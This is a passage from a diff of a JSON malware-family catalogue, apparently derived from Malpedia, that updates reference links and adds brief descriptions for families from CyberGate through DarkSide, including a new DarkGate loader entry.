Access Trojan (RAT) that allows an attacker to gain unauthorized access to\r\nthe victim\u2019s system. Attackers can remotely connect to the compromised system from anywhere\r\naround the world. The Malware author generally uses this program to steal private information\r\nlike passwords, files, etc. It might also be used to install malicious software on the compromised\r\nsystems.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://www.subexsecure.com/pdf/malware-reports/2021-05/cybergate-threat-report.pdf", - "https://citizenlab.ca/2015/12/packrat-report/", - "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", "https://sectrio.com/wp-content/uploads/2021/08/cybergate-threat-report.pdf", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://citizenlab.ca/2015/12/packrat-report/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ @@ -20472,7 +21440,7 @@ "value": "CycBot" }, { - "description": "Ransomware.", + "description": "According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat", @@ -20499,18 +21467,19 @@ "value": "cysxl" }, { - "description": "", + "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://malwareandstuff.com/peb-where-magic-is-stored/", "https://blog.netlab.360.com/dacls-the-dual-platform-rat/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", + "https://malwareandstuff.com/peb-where-magic-is-stored/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://blogs.vmware.com/security/2022/11/threat-analysis-active-c2-discovery-using-protocol-emulation-part4-dacls-aka-mata.html", "https://www.sygnia.co/mata-framework", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://vblocalhost.com/uploads/VB2021-Park.pdf" ], "synonyms": [ "MATA" @@ -20525,12 +21494,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke", - "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts", - "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", - "https://twitter.com/a_tweeter_user/status/1154764787823316993", - "https://twitter.com/ClearskySec/status/1110941178231484417", "https://www.youtube.com/watch?v=vx9IB88wXSE", - "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9" + "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9", + "https://twitter.com/ClearskySec/status/1110941178231484417", + "https://twitter.com/a_tweeter_user/status/1154764787823316993", + "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/", + "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts" ], "synonyms": [], "type": [] @@ -20543,12 +21512,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache", - "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - "https://twitter.com/killamjr/status/1204584085395517440", - "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97", - "https://twitter.com/cyb3rops/status/1199978327697694720" + "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a", + "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html", + "https://twitter.com/cyb3rops/status/1199978327697694720", + "https://twitter.com/killamjr/status/1204584085395517440" ], "synonyms": [], "type": [] @@ -20570,52 +21539,53 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", - "https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1", - "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/", "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", - "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", - "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense", - "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.mandiant.com/resources/supply-chain-node-js", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", - "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://assets.virustotal.com/reports/2021trends.pdf", "https://asec.ahnlab.com/en/30445/", - "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://blog.lexfo.fr/danabot-malware.html", - "https://security-soup.net/decoding-a-danabot-downloader/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", - "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", - "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", - "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service", - "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity", "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/", + "https://www.zscaler.com/blogs/security-research/danabot-launches-ddos-attack-against-ukrainian-ministry-defense", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://malverse.it/costruiamo-un-config-extractor-per-danabot-parte-1", + "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.zscaler.com/blogs/security-research/technical-analysis-danabot-obfuscation-techniques", + "https://news.sophos.com/en-us/2021/10/24/node-poisoning-hijacked-package-delivers-coin-miner-and-credential-stealing-backdoor", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github", + "https://www.mandiant.com/resources/supply-chain-node-js", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://security-soup.net/decoding-a-danabot-downloader/", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://www.zscaler.com/blogs/security-research/spike-danabot-malware-activity", + "https://blog.lexfo.fr/danabot-malware.html", + "https://www.bitdefender.com/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://research.checkpoint.com/danabot-demands-a-ransom-payment/", "https://twitter.com/f0wlsec/status/1459892481760411649", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://malwareandstuff.com/deobfuscating-danabots-api-hashing/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", + "https://blogs.blackberry.com/en/2021/11/threat-thursday-danabot-malware-as-a-service", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -20630,11 +21600,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot", "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/", "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f", - "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", - "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf", - "https://www.youtube.com/watch?v=FttiysUZmDw" + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" ], "synonyms": [], "type": [] @@ -20647,11 +21617,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit", - "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md", - "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/", "https://twitter.com/luc4m/status/1626535098039271425", - "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/" + "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel", + "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/", + "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md" ], "synonyms": [], "type": [] @@ -20664,6 +21634,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud", + "https://asec.ahnlab.com/en/53128/", "https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/" ], "synonyms": [], @@ -20677,26 +21648,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", - "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", - "https://content.fireeye.com/apt/rpt-apt38", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", - "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", - "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + "https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", + "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://content.fireeye.com/apt/rpt-apt38", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Breut", @@ -20713,8 +21685,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew", - "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia", - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/" + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", + "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia" ], "synonyms": [], "type": [] @@ -20735,6 +21707,32 @@ "uuid": "ccbc93b4-fd7a-4926-88f3-bcf5a1c530a5", "value": "DarkEye" }, + { + "description": "First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate", + "https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py", + "https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams", + "https://decoded.avast.io/janrubin/meh-2-2/", + "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", + "https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/", + "https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/", + "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", + "https://decoded.avast.io/janrubin/complex-obfuscation-meh/", + "https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md", + "https://medium.com/@DCSO_CyTec/shortandmalicious-darkgate-d9102a457232", + "https://github.security.telekom.com/2023/08/darkgate-loader.html" + ], + "synonyms": [ + "Meh" + ], + "type": [] + }, + "uuid": "977ef666-33b7-41d4-9d98-15ab0d16bede", + "value": "DarkGate" + }, { "description": "", "meta": { @@ -20794,8 +21792,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", - "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", - "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" + "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html" ], "synonyms": [ "Chymine" @@ -20864,130 +21862,131 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside", - "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", - "https://www.varonis.com/blog/darkside-ransomware/", - "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution", - "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack", - "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://www.secjuice.com/blue-team-detection-darkside-ransomware/", - "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/", - "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/", "https://www.secureworks.com/research/threat-profiles/gold-waterfall", - "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", + "https://twitter.com/embee_research/status/1678631524374020098?s=46", + "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/", + "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", + "https://brandefense.io/darkside-ransomware-analysis-report/", + "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution", + "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", "https://unit42.paloaltonetworks.com/darkside-ransomware/", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://www.secjuice.com/blue-team-detection-darkside-ransomware/", + "https://www.acronis.com/en-us/articles/darkside-ransomware/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", + "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/", + "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack", + "https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", + "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", + "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", + "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html", + "https://www.youtube.com/watch?v=NIiEcOryLpI", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/", + "https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://www.varonis.com/blog/darkside-ransomware/", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/", - "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf", - "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/", - "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", - "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", - "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/", - "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/", - "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", - "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/", - "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", - "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://zawadidone.nl/darkside-ransomware-analysis/", "https://asec.ahnlab.com/en/34549/", - "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware", + "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.acronis.com/en-us/articles/darkside-ransomware/", - "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/", - "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", - "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", - "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html", - 